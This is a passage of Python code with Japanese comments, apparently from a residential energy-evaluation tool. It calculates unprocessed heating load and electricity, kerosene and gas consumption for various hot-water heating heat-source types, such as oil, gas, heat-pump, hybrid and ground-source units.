mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
Returns:
ndarray: 温水暖房用熱源機の未処理
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 処理暖房負荷
Q_T_H_rad = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad[i - 1, :] = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 温水暖房用熱源機の温水供給運転率
r_WS_hs = calc_r_WS_hs_d_t(rad_list, Q_dmd_H_hs_d_t, Q_T_H_rad, Theta_SW_d_t, region, A_A, A_MR, A_OR, mode_MR)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_oil.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_oil.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_oil.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_gas.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
# 最大出力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 最大出力
Q_max_H_hs_d_t = hs_eheater.calc_Q_max_H_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs_d_t
elif hs_type == '電気ヒートポンプ温水暖房機':
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力
q_rtd_hs = hs_ehpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 外気条件の取得
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 最大出力
Q_max_H_hs_d_t = hs_ehpump.calc_Q_max_H_hs(
q_rtd_hs=q_rtd_hs,
Theta_SW_hs=Theta_SW_d_t,
Theta_ex=Theta_ex,
h_ex=h_ex
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs_d_t
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return np.zeros(24 * 365)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return np.zeros(24 * 365)
elif hs_type == 'コージェネレーションを使用する':
return np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
# 外気条件の取得
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Theta_ex_a_Ave = get_Theta_ex_a_Ave(Theta_ex)
Theta_ex_d_Ave_d = get_Theta_ex_d_Ave_d(Theta_ex)
Theta_ex_H_Ave = get_Theta_ex_H_Ave(Theta_ex, L_T_H_rad)
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
q_rtd_hs = hs_ghpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 最大出力
Q_max_H_hs_d_t = hs_ghpump.calc_Q_max_H_hs_d_t(
Theta_SW_d_t=Theta_SW_d_t,
Theta_ex_d_Ave_d=Theta_ex_d_Ave_d,
Theta_ex_H_Ave=Theta_ex_H_Ave,
Theta_ex_a_Ave=Theta_ex_a_Ave,
q_max_hs=q_rtd_hs,
L_H_x_t_i=L_T_H_rad,
L_CS_x_t_i=L_CS_x_t_i,
L_CL_x_t_i=L_CL_x_t_i,
HeatExchangerType=H_HS['HeatExchanger']
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
return Q_dmd_H_hs_d_t - Q_out_H_hs_d_t
else:
raise ValueError(hs_type)
# ============================================================================
# 7.1 エネルギー消費量
# ============================================================================
def calc_E_E_hs_d_t(H_HS, H_MR, H_OR, region, A_A, A_MR, A_OR, mode_MR, mode_OR, L_T_H_rad, CG, L_CS_x_t_i, L_CL_x_t_i):
"""温水暖房用熱源機の消費電力量
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
L_CS_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房顕熱負荷 (MJ/h)
L_CL_x_t_i(ndarray): 日付dの時刻tにおける暖冷房区画iの冷房潜熱負荷 (MJ/h)
Returns:
        ndarray: 温水暖房用熱源機の消費電力量
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 処理暖房負荷
Q_T_H_rad = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad[i - 1, :] = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 温水暖房用熱源機の温水供給運転率
r_WS_hs = calc_r_WS_hs_d_t(rad_list, Q_dmd_H_hs_d_t, Q_T_H_rad, Theta_SW_d_t, region, A_A, A_MR, A_OR, mode_MR)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
# 温水暖房用熱源機の灯油消費量
E_K_hs = calc_E_K_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
E_E_hs = hs_oil.calc_E_E_hs(
hs_type=hs_type,
r_WS_hs=r_WS_hs,
E_K_hs=E_K_hs
)
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
# 温水暖房用熱源機のガス消費量
E_G_hs = calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
E_E_hs = hs_gas.calc_E_E_hs(
r_WS_hs=r_WS_hs,
E_G_hs=E_G_hs
)
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
# 最大出力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 最大出力
Q_max_H_hs_d_t = hs_eheater.calc_Q_max_H_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
E_E_hs = hs_eheater.calc_E_E_hs(
Q_out_H_hs=Q_out_H_hs_d_t,
r_WS_hs=r_WS_hs
)
elif hs_type == '電気ヒートポンプ温水暖房機':
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力
q_rtd_hs = hs_ehpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 外気条件の取得
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 最大出力
Q_max_H_hs_d_t = hs_ehpump.calc_Q_max_H_hs(
q_rtd_hs=q_rtd_hs,
Theta_SW_hs=Theta_SW_d_t,
Theta_ex=Theta_ex,
h_ex=h_ex
)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs_d_t = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_ehpump.calc_E_E_hs(
Q_out_H_hs=Q_out_H_hs_d_t,
Q_max_H_hs=Q_max_H_hs_d_t,
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t,
Theta_SW_hs=Theta_SW_d_t,
Theta_ex=Theta_ex,
q_rtd_hs=q_rtd_hs
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 戻り温水温度 (℃)
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_gas_hybrid.calc_E_E_hs(
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t,
Theta_RW_hs=Theta_RW_hs,
Theta_ex=Theta_ex,
h_ex=h_ex,
Theta_SW_d_t=Theta_SW_d_t,
TU_place=H_HS['TU_place']
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
# 温水暖房用熱源機のガス消費量 (MJ/h)
E_G_hs = calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_hybrid_gas.calc_E_E_hs(
r_WS_hs=r_WS_hs,
E_G_hs=E_G_hs
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
# 1時間当たりの熱源機の消費電力量 (kWh/h)
return hs_whybrid.get_E_E_hs()
elif hs_type == 'コージェネレーションを使用する':
# コージェネレーションの場合は電力を計上しない
return np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Theta_ex_a_Ave = get_Theta_ex_a_Ave(Theta_ex)
Theta_ex_d_Ave_d = get_Theta_ex_d_Ave_d(Theta_ex)
Theta_ex_H_Ave = get_Theta_ex_H_Ave(Theta_ex, L_T_H_rad)
# 定格の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 定格能力 付録Hに定める温水暖房用熱源機の最大能力 q_max_hs に等しい
q_rtd_hs = hs_ghpump.calc_q_rtd_hs(
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
# 1時間当たりの熱源機の消費電力量 (kWh/h)
E_E_hs = hs_ghpump.calc_E_E_hs_d_t(
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t,
Theta_ex_a_Ave=Theta_ex_a_Ave,
Theta_ex_d_Ave_d=Theta_ex_d_Ave_d,
Theta_ex_H_Ave=Theta_ex_H_Ave,
Theta_SW_d_t=Theta_SW_d_t,
q_max_hs=q_rtd_hs,
L_H_x_t_i=L_T_H_rad,
L_CS_x_t_i=L_CS_x_t_i,
L_CL_x_t_i=L_CL_x_t_i,
HeatExchangerType=H_HS['HeatExchanger']
)
else:
raise ValueError(hs_type)
    print('{} E_E_hs = {} [kWh]'.format(hs_type, np.sum(E_E_hs)))
return E_E_hs
def get_rad_type_list():
"""放熱系の種類
Args:
Returns:
list: 放熱系の種類
"""
# 放熱系の種類
return [
'温水暖房用パネルラジエーター',
'温水暖房用ファンコンベクター',
'温水暖房用床暖房'
]
def get_rad_list(H_MR, H_OR):
"""主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
Args:
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
Returns:
list: 放熱機器の暖房区画ごとの配列
"""
# 暖房区画i=1-5に対応した放熱器のリストを作成
rad_list = [None, None, None, None, None]
# 放熱系の種類
rad_types = get_rad_type_list()
# 主たる居室
if H_MR is not None:
if H_MR['type'] in rad_types:
rad_list[0] = H_MR
# その他の居室
if H_OR is not None:
if H_OR['type'] in rad_types:
rad_list[1] = H_OR
rad_list[2] = H_OR
rad_list[3] = H_OR
rad_list[4] = H_OR
return rad_list
def calc_L_HWH(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""温水暖房用熱源機の熱負荷
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 温水暖房用熱源機の熱負荷
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
return Q_dmd_H_hs_d_t
def calc_E_K_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""温水暖房用熱源機の灯油消費量
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 温水暖房用熱源機の灯油消費量
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_oil.get_e_rtd_default(hs_type)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_oil.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_oil.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 戻り温水温度 (9)
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad)
# 温水暖房用熱源機の灯油消費量
E_K_hs = hs_oil.calc_E_K_hs(
Q_out_H_hs=Q_out_H_hs,
e_rtd=e_rtd,
hs_type=hs_type,
Theta_SW_hs=Theta_SW_d_t,
Theta_RW_hs=Theta_RW_hs,
region=region,
A_A=A_A,
A_MR=A_MR,
A_OR=A_OR,
mode_MR=mode_MR,
mode_OR=mode_OR,
has_MR_hwh=has_MR_hwh,
has_OR_hwh=has_OR_hwh
)
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
E_K_hs = hs_gas.get_E_K_hs()
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
E_K_hs = hs_eheater.get_E_K_hs()
elif hs_type == '電気ヒートポンプ温水暖房機':
E_K_hs = hs_ehpump.get_E_K_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
E_K_hs = hs_gas_hybrid.get_E_K_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
E_K_hs = hs_hybrid_gas.calc_E_K_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
E_K_hs = hs_whybrid.get_E_K_hs()
elif hs_type == 'コージェネレーションを使用する':
E_K_hs = np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
E_K_hs = hs_ghpump.get_E_K_hs_d_t()
else:
raise ValueError(hs_type)
print('{} E_K_hs = {} [MJ] (L_T_H_rad = {} [MJ])'.format(hs_type, np.sum(E_K_hs), np.sum(L_T_H_rad)))
return E_K_hs
def calc_E_G_hs_d_t(H_HS, H_MR, H_OR, A_A, A_MR, A_OR, region, mode_MR, mode_OR, L_T_H_rad, CG):
"""温水暖房用熱源機のガス消費量
Args:
H_HS(dict): 温水暖房機の仕様
H_MR(dict): 暖房機器の仕様
H_OR(dict): 暖房機器の仕様
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
CG(dict): コージェネレーションの機器
Returns:
ndarray: 温水暖房用熱源機のガス消費量
"""
hs_type = H_HS['type']
# 主たる居室、その他の居室という単位で設定された放熱機器を暖房区画ごとの配列に変換
rad_list = get_rad_list(H_MR, H_OR)
# 温水暖房用熱源機の往き温水温度
Theta_SW_hs_op = get_Theta_SW_hs_op(hs_type, CG)
p_hs = calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR)
Theta_SW_d_t = get_Theta_SW_d_t(Theta_SW_hs_op, p_hs)
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
E_G_hs = hs_oil.get_E_G_hs()
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
# 定格効率
if 'e_rtd_hs' in H_HS:
e_rtd = H_HS['e_rtd_hs']
else:
e_rtd = hs_gas.get_e_rtd_default(hs_type)
